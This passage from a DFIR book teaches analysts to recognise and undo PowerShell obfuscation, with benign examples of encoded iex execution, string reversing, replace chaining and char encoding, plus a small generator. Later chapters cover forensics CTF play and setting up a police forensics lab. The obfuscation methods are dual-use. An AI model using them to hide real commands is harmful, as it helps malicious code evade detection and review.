1 PS C:> & 'Get-Service' -Name ALG
2 PS C:> & 'Get-Service -Name ALG'
3 & : The term 'Get-Service -Name ALG' is not recognized as the name of a cmdlet
Because of this behavior, you're more than likely to see this being used to obfuscate cmdlets themselves. We can see this in practice by replacing the cmdlets in our compression example from before.
1 PS C:> $decoded = [System.Convert]::FromBase64String("H4sIAAAAAAAEAAsvyixJ1fUvLSkoL
2 VFQ8k9KKy1OTixJTVEISKzMyU9MUQIA9Wd9xiEAAAA=");$ms = (&'New-Object' System.IO.MemoryS
3 tream($decoded,0,$decoded.Length));&'iex'(&'New-Object' System.IO.StreamReader(&'New
4 -Object' System.IO.Compression.GZipStream($ms, [System.IO.Compression.CompressionMod
5 e]::Decompress))).ReadToEnd()
• 134. Chapter 5 - De-Obfuscating PowerShell Payloads 127
String Reversing
One of the benefits of PowerShell is its ability to interact with and manipulate data, including but not limited to strings. This opens the door to crafting payloads that are confusing to look at, which can be a very effective stall tactic to slow us down when breaking down their payloads. One such tactic is string reversing, where the characters of a string are stored in reverse order, as in the example below.
1 PS C:> $Normal = 'Write-Output "Obfuscated Payload"'
2 PS C:> $Reversed = '"daolyaP detacsufbO" tuptuO-etirW'
When we encounter these scenarios, we can typically re-reverse these strings by hand, or programmatically.
1 PS C:> $Reversed = '"daolyaP detacsufbO" tuptuO-etirW'
2 PS C:> iex $((($Reversed.length - 1)..0 | ForEach-Object {$Reversed[$_]}) -join '')
3 Obfuscated Payload
These scripts cannot be executed on their own in this format; they have to be placed back in their intended order. Because of this, you'll typically see logic in place to reverse the string back to its intended order. However, if you don't see that logic, then the string is likely intended to be reversed.
• 135. Chapter 5 - De-Obfuscating PowerShell Payloads 128
Replace Chaining
Another method that PowerShell can use to manipulate strings is replacing substrings with other values, or removing them entirely. This can be done using the Replace() method of a System.String object or the PowerShell -replace operator.
1 PS C:> iex('Write-Input "Obfuscated Payload"' -replace "Input","Output")
2 Obfuscated Payload
3
4 PS C:> iex('Write-Input "Obfuscated Payload"'.replace("Input","Output"))
5 Obfuscated Payload
It's very common to see payloads that use string replacements, but keep in mind that you could see these replace statements chained in ways that increase their complexity.
1 PS C:> iex $(iex '''Write-Intup "0bfuscated Payload"''.replace("Input","0utput")'.R
2 eplace('tup','put')).replace("'","").replace('0','O')
3 Obfuscated Payload
When dealing with these replace operations, pay very close attention to your integrated development environment (IDE). If you look closely, you'll see that one of the replace statements is the color of a string, which means that in that position it's indeed a string and not a method invocation. It's very common for people to do these search-and-replace operations manually, but if you do so out of order, you could inadvertently break the script logic.
  • 136. Chapter 5 - De-Obfuscating PowerShell Payloads 129 ASCII Translation When we view strings we are seeing them in a format that we understand, their character values. These character values also have binary representation of the character that your computer will understand. For example, we know that the ASCII value of the character ‘a’ is 97. To the benefit of some, so does PowerShell out of the box. We can see this understanding directly from the console through type casting. 1 PS C:> [byte][char]'a' 2 97 3 4 PS C:> [char]97 5 a What this allows red teamers to do is to add a level of complexity by replacing any arbitrary character values and convert them into their ASCII derivative. We can see in practice by using our inline base64 expression from before. 1 PS C:> iex ([System.Text.Encoding]::Unicode.GetString(([convert]::FromBase64String( 2 $([char]86+[char]119+[char]66+[char]121+[char]65+[char]71+[char]107+[char]65+[char]1 3 00+[char]65+[char]66+[char]108+[char]65+[char]67+[char]48+[char]65+[char]84+[char]11 4 9+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]99+[char]65+[char]66+[ 5 char]49+[char]65+[char]72+[char]81+[char]65+[char]73+[char]65+[char]65+[char]105+[ch 6 ar]65+[char]69+[char]56+[char]65+[char]89+[char]103+[char]66+[char]109+[char]65+[cha 7 r]72+[char]85+[char]65+[char]99+[char]119+[char]66+[char]106+[char]65+[char]71+[char 8 ]69+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]71+[char]81+[char] 9 65+[char]73+[char]65+[char]66+[char]81+[char]65+[char]71+[char]69+[char]65+[char]101 10 +[char]81+[char]66+[char]115+[char]65+[char]71+[char]56+[char]65+[char]89+[char]81+[ 11 char]66+[char]107+[char]65+[char]67+[char]73+[char]65))))) 12 Obfuscated Payload When you see these types of payloads, be sure to pay close attention to your IDE. If they are not color coded to that of a string, then that means that PowerShell will automatically translate them to their intended value during invocation. You can view their actual value the same way by selecting them and running the selected code.
  • 137. Chapter 5 - De-Obfuscating PowerShell Payloads 130 1 PS C:> $([char]86+[char]119+[char]66+[char]121+[char]65+[char]71+[char]107+[char]65 2 +[char]100+[char]65+[char]66+[char]108+[char]65+[char]67+[char]48+[char]65+[char]84+ 3 [char]119+[char]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]99+[char]65+[c 4 har]66+[char]49+[char]65+[char]72+[char]81+[char]65+[char]73+[char]65+[char]65+[char 5 ]105+[char]65+[char]69+[char]56+[char]65+[char]89+[char]103+[char]66+[char]109+[char 6 ]65+[char]72+[char]85+[char]65+[char]99+[char]119+[char]66+[char]106+[char]65+[char] 7 71+[char]69+[char]65+[char]100+[char]65+[char]66+[char]108+[char]65+[char]71+[char]8 8 1+[char]65+[char]73+[char]65+[char]66+[char]81+[char]65+[char]71+[char]69+[char]65+[ 9 char]101+[char]81+[char]66+[char]115+[char]65+[char]71+[char]56+[char]65+[char]89+[c 10 har]81+[char]66+[char]107+[char]65+[char]67+[char]73+[char]65) 11 VwByAGkAdABlAC0ATwB1AHQAcAB1AHQAIAAiAE8AYgBmAHUAcwBjAGEAdABlAGQAIABQAGEAeQBsAG8AYQBk 12 ACIA These types of techniques can also be mix-matched so you’re using a combination of both characters and ASCII values within the same string. 1 PS C:> iex "Write-Output $([char]34+[char]79+[char]98+[char]102+[char]117+[char]115 2 +[char]99+[char]97+[char]116+[char]101+[char]100+[char]32+[char]80+[char]97+[char]12 3 1+[char]108+[char]111+[char]97+[char]100+[char]34)" 4 Obfuscated Payload We can use the following generator as a means to create the above-scenario for practice. 1 $String = 'Write-Output "Obfuscated Payload"' 2 '$(' + (([int[]][char[]]$String | ForEach-Object { "[char]$($_)" }) -join '+') + ')'
  • 138. Chapter 5 - De-Obfuscating PowerShell Payloads 131 Wrapping Up In this chapter we walked through different types of PowerShell obfuscation techniques that are frequently leveraged in the wild and how we can step through them to successfully de-obfuscate them. It is important for us to keep in mind that these are not the only tricks that are available in the obfuscation trade. There are many tricks, both known and unknown to your fellow security researchers in this field that could be used at any time. With practice and experience, you’ll be able to de-obfuscate extremely obfuscated reverse shell payloads, such as this:
  • 139. Chapter 5 - De-Obfuscating PowerShell Payloads 132 One of the best ways to stay ahead of the curve is to ensure that you have a solid understanding of PowerShell. I would recommend that you take a PowerShell programming course if you’re coming into this green. If you have some level of comfort with using PowerShell, I challenge you to use it even more. Find a workflow that’s annoying to do manually and automate it. You can also take some time and even optimize some of your older scripts. Never stop challenging yourself. Go the extra mile, stand up and stand strong. Keep moving forward and you’ll be in a position where you’ll be able to help others grow in the domains that you once found yourself struggling with. Tristram
Chapter 6 - Gamification of DFIR: Playing CTFs

By Kevin Pagano¹⁴¹ | Website¹⁴² | Twitter¹⁴³ | Discord¹⁴⁴

What is a CTF?

The origins of CTF, or "Capture The Flag", are found on the playground. It was (still is?) an outdoor game where teams had to run into the other team's zone, physically capture a flag (typically a handkerchief), and return it to their own base without getting tagged by the opposing team. In the information security realm, the term has come to describe a slightly different competition.

Why am I qualified to talk about CTFs? Humble brag time. I've played in dozens of CTF competitions and have done pretty well for myself. I am the proud recipient of 3 DFIR Lethal Forensicator coins¹⁴⁵ from SANS and one Tournament of Champions coin (and trophy!), a 3-time winner of Magnet Forensics CTF competitions, a 4-time winner of the BloomCON CTF competition, and more. I've also assisted in creating questions for some CTF competitions, as well as writing thorough analysis write-ups of events I've competed in on my personal blog¹⁴⁶.

¹⁴¹https://github.com/stark4n6
¹⁴²https://www.stark4n6.com/
¹⁴³https://twitter.com/KevinPagano3
¹⁴⁴http://discordapp.com/users/597827073846935564
¹⁴⁵https://www.sans.org/digital-forensics-incident-response/coins/
¹⁴⁶https://ctf.stark4n6.com
Types of CTFs

Two of the most common styles of information security CTF competitions are "Jeopardy" and "Attack and Defense".

"Jeopardy" style typically presents a list of questions of varying difficulty with set, defined answers. The player or team is given some sort of file or evidence to analyze, then has to find the flag for each question and input it in the proper format to score points.

9.1 - Jeopardy style CTF

"Attack and Defense" is more common in Red and Blue Team environments, where the Red Team has to hack or attack a Blue Team server. The Blue Team subsequently has to try to protect itself from the attack. Points can be given for time held or for acquiring specific files from the adversary.

9.2 - Attack and Defense CTF

Depending on the CTF, you may see a combination of types, such as "Jeopardy"-style competitions with linear (story-based) elements that leave some questions hidden or locked until a certain prerequisite question is answered. For this chapter, I will go more in-depth on "Jeopardy"-style competitions, more specifically forensics-geared CTF competitions.
Evidence Aplenty

With forensics CTFs, just like in real life, any type of device is fair game to be analyzed. In the ever-growing landscape of data locations, there are more and more places to look for clues to solve the problems.

One of the better-known forensic CTFs is the SANS NetWars¹⁴⁷ tournament series. These are devised with 5 levels, each progressively harder than the last. In this competition you will have a chance to analyze evidence from:

- Windows computer
- macOS computer
- Memory/RAM dump
- iOS dump
- Android dump
- Network (PCAP/Netflow/Snort logs)
- Malware samples

You can see from the above list that you get a well-rounded variety of evidence types that you will most likely see in the field on the job. In other competitions I've played, you could also come across Chromebooks, or even Google Takeout and other cloud resources as they become more common. I have also seen some that are more crypto-based, in which you will be working with different ciphers and hashes to determine the answers.

¹⁴⁷https://www.sans.org/cyber-ranges/
Who's Hosting?

As previously mentioned, SANS is probably the best-known provider of a forensics CTF through their NetWars¹⁴⁸ program. It isn't cheap as a standalone, but it is sometimes bundled with one of their training courses. You can sometimes see it hosted for free at other events, such as OpenText's enFuse conference.

As for others, Magnet Forensics has been hosting a CTF for the past 5 years in tandem with their User Summit. It has been created by Jessica Hyde in collaboration with students from Champlain College's Digital Forensics Association; some previous Magnet CTFs were created by Dave Cowen and Matthew Seyer. Other software vendors have started to create their own as well to engage with the community: Cellebrite has hosted virtual CTF competitions for the past 2 years, and Belkasoft has created and put out multiple CTFs¹⁴⁹ over the last 2 years. DFRWS¹⁵⁰ hosts a yearly forensic challenge, with past events covering evidence types such as PlayStation 3 dumps, IoT (Internet of Things) acquisitions, mobile malware, and many others.

Another fantastic resource for finding challenges is CyberDefenders¹⁵¹. They host hundreds of CTF challenges, both from past events and ones that people have uploaded. You can even contribute your own if you'd like, or have them host your next live event.

9.3 - CyberDefenders website

Another fairly exhaustive list of past challenges and evidence can be found on AboutDFIR¹⁵².

¹⁴⁸https://www.sans.org/cyber-ranges
¹⁴⁹https://belkasoft.com/ctf
¹⁵⁰https://dfrws.org/forensic-challenges/
¹⁵¹https://cyberdefenders.org/blueteam-ctf-challenges/
¹⁵²https://aboutdfir.com/education/challenges-ctfs/
Why Play a CTF?

So at the end of the day, why should YOU (yes, YOU, the reader) play a CTF? Well, it depends on what you want to get out of it.

For Sport

Growing up, I've always been a competitive person, especially playing sports like baseball and basketball, and CTFs are no different. There is a rush of excitement (at least for me) in competing against other like-minded practitioners or analysts to see how you stack up.

You can even be anonymous while playing. Part of the fun is coming up with a creative handle or username to compete under. It also keeps the commentary and your competitors on their toes. I personally like to problem-solve and to be challenged, which is part of the reason I enjoy playing.

For "Profit"

I put profit in quotation marks because many may construe that as a compensation-type objective. While many CTF challenges do have prizes such as challenge coins or swag (awesome branded clothing, anyone?!), that's not quite the profit I'm talking about here. The profit is the knowledge you gain from playing. I've entered competitions where I didn't know how to analyze memory dumps at all, and I learned at least the basics of where to look for evidence, plus new techniques to try later in real-world scenarios.

"Commit yourself to lifelong learning. The most valuable asset you'll ever have is your mind and what you put into it." - Albert Einstein

The knowledge you gain from the "practice" will inevitably help you in the future; it's just a matter of time. Seriously, you don't know what you don't know. Remember when I said you can be anonymous? It doesn't matter if you get 10 points or 1000 points; as long as you learn something new and have fun while doing so, that's all that matters.
Toss a Coin in the Tip Jar

I get asked all the time, "what are your keys to success playing CTFs?". That's probably a loaded question, because many factors can lead to good results. Here, I will break it down into sections that I feel can at least get you started on a path to winning your first CTF.

Tips for Playing - Prior

First and foremost is the preparation phase. Like any task in life, it always helps to be prepared for the battle ahead. Having a sense of what is to come will help with your plan of attack.

Do your research! If you know that a specific person created the CTF, take a look at their social media profiles. Oftentimes they will release hints in some form or fashion, whether in webinars they have shared or in research papers and blog posts they have recently published. Don't overdo it though; there could be red herrings amok. You can also look at past CTFs they have created to see how questions were formulated before and what sorts of locations they tend to lean on for flags. This is part of the reason I personally do write-ups of past CTFs: for future reference.

Each CTF's rules are different, but sometimes players are allowed to reach out to colleagues or others to form a squad. Knowledge from multiple people well-versed in different topics can help in spreading out the workload, especially if there are multiple forms of evidence to be analyzed. I would be remiss if I didn't say that some of my winning efforts were with team members who picked up sections where I wasn't as strong. Your mileage may vary, though. Make sure to coordinate your efforts with your teammates so you don't all waste time working on the same questions.

If evidence is provided ahead of the competition, make sure to spend some time getting familiar with it. Process the evidence beforehand so you aren't wasting time during the live competition waiting on machine time. Some of these events only last 2-3 hours, so time is of the essence.

This segues right into building out your analysis machine and your toolkit. Make sure that all your system updates are completed beforehand. The last thing you need is an errant Windows update taking down your system while you watch the spinner.
9.4 - "This will take a while"

You may also consider making sure you have local admin access, or at least the ability to turn off antivirus (if you are analyzing malware) on your computer. Always do so in a controlled environment if possible, but you knew this already (I hope).

If you are provided a toolkit or a trial of a commercial license, use it to your advantage, even if only as a secondary set of tools. Some vendors will formulate the answer in exactly the format their own software spits out. Also, commercial tools can potentially speed up your analysis compared to a collection of free tools, but that is personal preference.
The Toolkit

I'm a Windows user through and through so I cannot offer much advice from a Mac or Linux perspective. With that said, I do have some tools that I use from a forensic perspective to analyze those types of evidence. Here are my favorite (free) tools that I use during CTFs:

General Analysis
- Autopsy¹⁵³
- Bulk Extractor¹⁵⁴
- DB Browser for SQLite¹⁵⁵
- FTK Imager¹⁵⁶
- Hindsight¹⁵⁷

Chromebook
- cLEAPP¹⁵⁸

Ciphers
- CyberChef¹⁵⁹
- dcode.fr¹⁶⁰

Google Takeout / Returns
- RLEAPP¹⁶¹

Mac
- mac_apt¹⁶²
- plist Editor - iCopyBot¹⁶³

Malware/PE
- PEStudio¹⁶⁴
- PPEE (puppy)¹⁶⁵

Memory/RAM
- MemProcFS¹⁶⁶
- Volatility¹⁶⁷

¹⁵³https://www.autopsy.com/
¹⁵⁴https://github.com/simsong/bulk_extractor
¹⁵⁵https://sqlitebrowser.org/dl/
¹⁵⁶https://www.exterro.com/ftk-imager
¹⁵⁷https://dfir.blog/hindsight/
¹⁵⁸https://github.com/markmckinnon/cLeapp
¹⁵⁹https://gchq.github.io/CyberChef/
¹⁶⁰https://www.dcode.fr/en
¹⁶¹https://github.com/abrignoni/RLEAPP
¹⁶²https://github.com/ydkhatri/mac_apt
¹⁶³http://www.icopybot.com/plist-editor.htm
¹⁶⁴https://www.winitor.com/
¹⁶⁵https://www.mzrst.com/
¹⁶⁶https://github.com/ufrisk/MemProcFS
¹⁶⁷https://www.volatilityfoundation.org/releases
Mobile Devices
- ALEAPP¹⁶⁸
- Andriller¹⁶⁹
- APOLLO¹⁷⁰
- ArtEx¹⁷¹
- iBackupBot¹⁷²
- iLEAPP¹⁷³

Network
- NetworkMiner¹⁷⁴
- Wireshark¹⁷⁵

Windows Analysis
- Eric Zimmerman tools / KAPE¹⁷⁶
- USB Detective¹⁷⁷

This whole list could be expanded much further, but these are the majority of the go-tos in my toolkit.

Tips for Playing - During

We've all been there. You get to a point in the middle of a CTF where you start to struggle. Here are some things to key in on while actually playing.

Read the titles of the questions carefully. Often they are riddled with hints about where to look. "Fetch the run time of XXX application." Maybe you should analyze those Prefetch files over there? Questions will often also tell you how to format your answer submission. This may tell you that the timestamp you're hunting is incorrect - those pesky timezone offsets!

Did you find a flag that appears to be a password? It's almost guaranteed that that evidence was placed in such a way that it will be reused. Emails and notes can be a treasure trove of passwords to encrypted containers or files.

One thing that may seem silly but can help is simply asking questions. If you're stumped on a question, talk to the organizer if you can; they may lead you in a direction you didn't think of when you set off on your path of destruction.

¹⁶⁸https://github.com/abrignoni/ALEAPP
¹⁶⁹https://github.com/den4uk/andriller
¹⁷⁰https://github.com/mac4n6/APOLLO
¹⁷¹https://www.doubleblak.com/software.php?id=8
¹⁷²http://www.icopybot.com/itunes-backup-manager.htm
¹⁷³https://github.com/abrignoni/iLEAPP
¹⁷⁴https://www.netresec.com/?page=NetworkMiner
¹⁷⁵https://www.wireshark.org/
¹⁷⁶https://ericzimmerman.github.io/#!index.md
¹⁷⁷https://usbdetective.com/
9.5 - Don't Sweat It, Take the Hint

Some CTF competitions have a built-in hint system. If hints don't count against your overall score, take them! The chance of a tiebreaker coming down to who used fewer hints is extremely small. If the hint system costs points, you will need to weigh the pros and cons of not completing a certain high-point question against losing 5 points for buying that hint.

The last tip for playing is to write down your submissions, both the correct and incorrect ones. I can't tell you the number of times I've re-entered the same wrong answer for a question, eventually getting points docked off my total. This will not only help you during the live CTF but afterwards as well, if you write a blog on your walkthroughs.
Strategies

There are multiple strategies you can use for attacking the questions during the competition. Usually they will be broken out into different categories by type of evidence, such as Mobile / Computer / Network / Hunt. Some people prefer to finish all the questions in one section before jumping to the next. If you're really good at mobile forensics, for instance, starting with those questions may be a good strategy if you are less experienced in other areas.

Another potential strategy depends on how many points the questions are worth. Usually, the more the points, the harder the question. Some people prefer to go after high-value questions first to put large points on the scoreboard and put pressure on the other competitors. Others prefer to go for the lower-point questions first and work their way up.

My personal strategy is a combination of them all. I will typically go for the easy points first and work my way up from there, but I will jump between evidence categories once I start to get stuck. Depending on how much pre-work analysis has been done, I may have inferred references to areas that need to be analyzed. I can then look for questions that I may already have answers for.

And then there are the confident ones (sometimes too confident!). Some players, knowing that they have the answers already, will hold off on submitting for points until very late in the competition to mess with the other competitors. Some CTF competitions will freeze the board for the last 15-30 minutes to make the final scores a surprise to all. I would advise against this tactic, but if you're that confident, then by all means.

At the end of the day, the right strategy is whatever suits the player best.

"You miss 100% of the shots you don't take. - Wayne Gretzky" - Michael Scott
Takeaways

What can you take away from playing a CTF, you ask? You may have different feelings about what you get out of playing CTFs, but here are a few of my personal takeaways.

Documentation

One of the things I enjoy doing after playing a CTF is writing blog write-ups of my solutions. If there are questions I didn't finish during the live competition, I tend to go back and revisit them to see if I can solve them properly. Once I have a majority of the answers, I start writing posts on how I solved the questions. Not only does this help me document my results for future use, it also helps me gain experience in technical writing. I can't tell you how many times I've referenced my own posts in other competitions, or in research as I dove back into file system locations I had never looked at before. Documentation is critical in many aspects of an investigation, so it only makes sense to write down your notes in case you need to reference where a specific artifact came from. The best part is that not all questions will be solved the same way. I thoroughly enjoy reading other solvers' thought processes for getting to the end result.

Challenge Yourself & Build Confidence

I'm going to stress it again; playing CTFs will help you learn. For those who don't get to work with some of the different evidence types, like Linux or network files, the CTF datasets will give you plenty to take home and analyze. Before playing SANS NetWars, I had rarely touched PCAP files, let alone knew how to utilize Wireshark to pull out files or specific packets. Learning about Google Takeout exports has given me a new appreciation for what potential evidence can be found in the cloud and what may not be found directly on a mobile device. This has led to me doing my own research and contributing back to the community in tools like RLEAPP¹⁷⁸ and other open-source projects. These are just a few examples of getting out of your comfort zone and challenging yourself to learn about new tools and techniques.

It's also important to build your confidence. Just because you don't place well the first time you play doesn't mean you can't get better. I know when I started out, I struggled in competitions. I didn't know where to go to find answers or how to get to them. It all comes back to practice. Any athlete will tell you that repetitions of a task will only make you better at that specific task, and it is no different with CTFs and examinations. If you see something often enough, you'll start seeing patterns like Neo in the Matrix.

¹⁷⁸https://github.com/abrignoni/rleapp
9.6 - "I know kung-fu!"

Have Fun!

The number one takeaway from playing CTFs is to have fun! These competitions are meant to be training exercises that stimulate the mind and give you a break from your normal workload. Don't stress it, just keep learning. If you're in person, enjoy the camaraderie of the other competitors and build your network. You never know who you may meet while playing and who you will cultivate friendships with in the industry.

I hope this chapter breathes new life into you playing CTF competitions. Good luck and see you all out there on the digital battlefields!
Chapter 7 - The Law Enforcement Digital Forensics Laboratory

Setting Up and Getting Started

By Jason Wilkins¹⁷⁹ | Website¹⁸⁰ | Discord¹⁸¹

Executive Cooperation

The necessity of executive cooperation

When I was approached by my superiors at the police department to establish a Digital Forensics lab, I immediately felt overwhelmed and intimidated: I was new to the field and unsure of my ability to achieve the task. I began scouring the internet for ideas and advice on what tools would be needed and what training I would require. After deciding on the software that we would begin using in our lab, I began the year-long training offered by the company to get certified in their product. It was here that I met my first mentor and really began having my questions answered. He introduced me to the Digital Forensics Discord Server and AboutDFIR.com, and these two resources alone have done so much to reduce the barriers to entry that existed prior to their creation. As I gained confidence in my abilities and familiarity with the industry, I was better able to approach my executive leadership in a way that fostered a professional understanding, which in turn led to greater cooperation in budgeting and planning.

¹⁷⁹https://twitter.com/TheJasonWilkins
¹⁸⁰https://www.noob2pro4n6.com/
¹⁸¹http://discordapp.com/users/656544966214025256
To say that Digital Forensics can be expensive is quite often an understatement. Many law enforcement agencies do not have the budget to even make the attempt. In those cases, they usually depend upon larger agencies or state or federal labs, or do not attempt the feat at all.

Making your case to executive leadership

In these times, every crime contains an aspect of digital evidence. As detectives and prosecutors attempt to add legs to the table of their argument, they are forced to acknowledge the value of Digital Forensics in nearly every case. Most law enforcement executives understand this and will already be amenable to the idea that it would be a great addition to their department. However, wherever cost is involved, they will initially resist the eager forensic examiner wishing to purchase every cool toy available. You must be professional, courteous, and extremely patient if you wish to be taken seriously. Create a business plan for the lab, complete with a section for the present state and future goals. Make a list of the tools and training needed, with prices and a budget for everything. Include the cost of payroll for analysts, and use this financial bottom-line strategy to sell the idea to your decision-makers. I would advise caution when using the technique of asking for the world in hopes of blind acceptance. This will do very little to add credibility to your reputation and may hinder you in the future when you need to ask for more. The way I decided to go was to determine just what was necessary to get started, and to return to ask for more as I encountered roadblocks.

Open communication and trust

By showing respect and understanding for the position and responsibility of the executive leadership to the tax-paying citizens of our community, I was able to earn their trust and cooperation. I have never received a negative response to any request that I have made. Whenever an obstacle was encountered and a solution was needed that the lab did not already provide for, I made the request and either received approval for what was needed or was given a timeline of when the funds would be available. Open communication and trust are necessary for any relationship to maintain integrity, and that is no different for professional cooperation than for personal connection. Always approach decision-makers with respect, and then console yourself with patience and faith in their response. As an examiner, you are not always privy to all the budgetary, legal, or political issues that may affect your request. This is where the trust that you would like to be shown must be reciprocated in kind. By approaching every situation in this way, you will earn the respect and trust of your executive leadership and make your professional life more satisfying in the long run.
Physical Requirements

Physical security and accessibility

When you begin to create the business plan for the digital forensics lab, you will first need to find a suitable space that provides physical security and room to accommodate your personnel and equipment. A small department using low-cost and free tools may only require a single examiner, an office with one computer, and a desk. A larger agency may require space for several people, workstations, evidence lockers, and lab equipment. The fact is that you can begin implementing digital forensics in your agency with free tools and existing personnel and hardware. However, you will find yourself running up against obstacles immediately and wanting better solutions. Either way, because you are handling evidence that may implicate or exculpate someone of criminal behavior, you need to take security very seriously from the start. Chain of custody and physical access control should be at the forefront of your thoughts throughout the forensic process. At the very least, the lab should be locked when unoccupied and all keyholders accounted for. Digital ID scan access provides accountability and the ability to deny access, and it is relatively low-cost to implement.

Floor plans

The floor plan you decide upon is going to be very distinctly individual to your agency's needs and capability. However, you should take into account the number of devices you believe you will be handling, the amount of time you will have possession of them for storage purposes, and how many people you will have assigned to the lab. If your lab has only one examiner and handles only a hundred or so mobile devices a year, then you may get by with a space as small as a ten-by-ten office with a desk for your computer, a cabinet or shelves for your devices, and a file cabinet for your case files. As you expand capabilities and personnel, however, you will quickly outgrow that amount of space. With microscopes, faraday cages, and extra workstations, you will need room for the movement of individuals between tables. With a greater number of devices, you will need more room for shelves, charging cabinets, and workflow organization. Mobile devices quickly begin stacking up and becoming disorganized chaos if you do not establish sound workflow processes and case management practices. You need to know which devices are next in line, which are being processed, and which are ready to be returned. If a device is lost while in your custody, it will have serious consequences for you, your agency, and most importantly, the case. Having the space to organize your work properly is therefore of paramount importance.

Selecting Tools

Network Requirements

Your forensic workstations and tools may or may not require a connection to the internet, but when they do, you should at least utilize a dedicated line and/or a virtual private network.
Malware can be transferred from devices to your system and network if you are not careful. Even the forensic software on your workstation can set off alarms in your IT department. Trust me on that one; I speak from experience. It was just that sort of event that convinced my IT director that I needed a dedicated connection. You may find that you need one connection for your forensic workstations and a separate one for your administrative computer. Just be aware of the very real danger to your network presented by strange devices. Even a detective bringing you a thumb drive to place evidence on can present an unwitting threat. Always practice safe handling of devices when considering making any connections to your system.

Selecting forensic workstations

This is perhaps the most common question asked when someone first considers getting into digital forensics: what kind of computer is needed for the job? It is also the most fun part for those of us who nerd out over computer specifications and configurations. Boiling it down, you will need great processing power and vast storage. Always refer first to the software you choose to determine the minimum and optimal specifications for that particular tool. I have found that you will basically be building a super gaming computer because of the amount of graphics processing you will need. It is because of this that you may need to convince your superiors that you are not trying to play video games in the lab when you are supposed to be working. That said, here are the specifications of my first workstation at the police department:

• Dell Precision 5820 Tower X-Series
• Intel Core i9-9820X CPU @ 3.30 GHz (3312 MHz, 10 cores, 20 logical processors)
• Radeon Pro WX 5100 graphics card (I wanted an NVIDIA GeForce 3060 at the time)
• 128 GB RAM
• 1 TB SSD (for the operating system and program files)
• 2x 4 TB hard drives (for file storage)

I wanted an Alienware Aurora desktop but compromised on the above setup. Never forget that you are asking to spend other people's money when working in law enforcement, and you may have to make concessions for that very reason. Always show gratitude and a positive attitude when granted anything.

Selecting forensic software

I want to preface this section by acknowledging that I have made many friends in the field of digital forensics in the few short years I have been working in the industry. Some work for companies that make competing software. I have found that collaboration, even among competitors, is like nothing seen in any other market. That said, I will not be granting any single product my sole endorsement, but rather will describe the pros and cons of each as I see them.

The largest players in commercial off-the-shelf digital forensics solutions are Magnet Forensics, Cellebrite, Oxygen Forensics, Belkasoft, Exterro, Basis Technology, MSAB, and EnCase.
These are not in any particular order, and I have not intentionally excluded any not listed; they are simply the products I have had personal experience with and see most often discussed between examiners. In my day-to-day operations, I use both Magnet AXIOM and Cellebrite, depending on which report my detectives prefer. A smaller agency may not have the budget for both, or either. Autopsy is an excellent free program from Basis Technology, created by Brian Carrier. I have used it to validate evidence extracted with commercial tools to great success. I would recommend it as a must-have for every lab for that very reason.

When considering open-source and free software, always use a test environment before implementing it on a production network. There are many exciting and brilliant tools made freely available to the community by their authors, some of which allow you to contribute code toward their improvement. Thanks to Brian Carrier, we have Autopsy; Eric Zimmerman gave us KAPE and EZ Tools; and Alexis Brignoni, the Log Events and Properties Parser (xLEAPP) series. There are so many wonderful free tools out there that you could fill an entire book; you will discover them and want to try them out as much as possible, as there is no single tool that does everything perfectly. As an examiner, you will need to be a lifelong learner and stay connected to the community to remain on top of new discoveries, tools, and techniques.

Selecting peripheral equipment

You will find very quickly that workstations and software are only the beginning of your expenditures. Many peripheral devices and tools will also need to be purchased to assist with various examinations. You can plan to purchase them upfront or as needed. In some cases, you may only use a device once in several years. While this list is in no way exhaustive or exclusive, it is representative of the tools I purchased for my lab as I discovered the need for them:

• A digital camera for photographing devices and crime scenes. It is helpful to purchase one capable of recording video in high definition and connecting to your workstation for file transfer
• An external SSD for transferring files between workstations. The larger and faster, the better
• Computer hand tools made specifically for computer or mobile device repair
• A heat gun for melting the glue around a mobile device touchscreen
• A magnifying visor with a light for seeing small screws and writing
• Various cables for connecting to different types of hard drives and SSDs (e.g., IDE, ATA, SATA, USB)
• Data transfer cables for various types of phones (e.g., Lightning, Micro USB, USB-C, Mini USB)
• An anti-static mat
• A write blocker for preventing data writes on target hard drives
• A charging cabinet for devices that are being brute-forced
• Faraday bags and a faraday cage to keep devices from touching mobile networks
• External battery chargers for transporting low-power devices from the crime scene to the lab
• SIM card and SD card readers
• An APC battery backup and surge protector for your expensive workstations

There are many other items you may or may not discover the need for as your caseload grows, but these are the most likely. You may also consider purchasing cloud services for the storage of digital evidence, or have your IT department set up dedicated server space that can be expanded. Smaller agencies may simply use hard drives stored in the evidence locker.

Planning for Disaster

You will want a disaster recovery plan for lightning strikes, flooding, fire, earthquake, or simply hardware failure and viruses. You will invest tens of thousands of dollars and countless hours planning, purchasing, and setting up your lab; a good disaster recovery plan protects that investment. You may want to back up your workstation once per week. The rule is to store at least one copy of your backups on site and duplicate copies at an off-site location. You may want to log all updates to your workstation in case you encounter an issue and need to roll back or troubleshoot new problems. Keep your forensic workstation on a dedicated network of its own if it needs an internet connection at all. Invest in a good antivirus and monitoring tool. In the recovery plan, you will also need to consider upgrading components every two to three years, as wear will degrade your equipment over time.

Certification and Training

Some US states require digital forensics examiners to be certified. Whether or not that is the case for your location, it is good to consider having at least one examiner certified and trained to teach others. There are non-profit organizations, such as the National White Collar Crime Center (NW3C), that offer both training and certification for Cyber Crime Examiners and Investigators free of cost to law enforcement and government personnel. The training is on par with that of for-profit organizations, and the certification is much less costly. There is no exam, as it is experience-based, and it lasts for one year. As stated, there are also for-profit organizations that offer certification, and individual vendors that certify users of their specific tools.

Why should you get certified?

Certification is worth the investment of time and money, and it is greatly helpful when called to the stand in court. Your testimony will carry more weight if you are certified, and the knowledge gained from the training involved will help you make competent and confident statements when cross-examined.
Where to find training

I always suggest that everyone begin their quest for information at AboutDFIR.com¹⁸². You will find ample resources and an updated list of training with prices. Some other sites to consider are DFIRDiva.com¹⁸³ and DFIR.Training¹⁸⁴. The SANS Institute¹⁸⁵ has very reputable programs for training and certification that are recognized worldwide, though they are costly and not recommended (by me) for inexperienced examiners. Their certification exams are open book and timed, and you are given practice tests prior to taking the final. Should you achieve this level of certification, you will definitely be considered a member of an elite class of Digital Forensics Examiners.

Creating a training plan for your lab

Whether you are the only examiner or you have multiple people working in your lab, you need to have a training plan for everyone, especially if they are trying to maintain certifications that require annual credit hours for reinstatement.

Accreditation

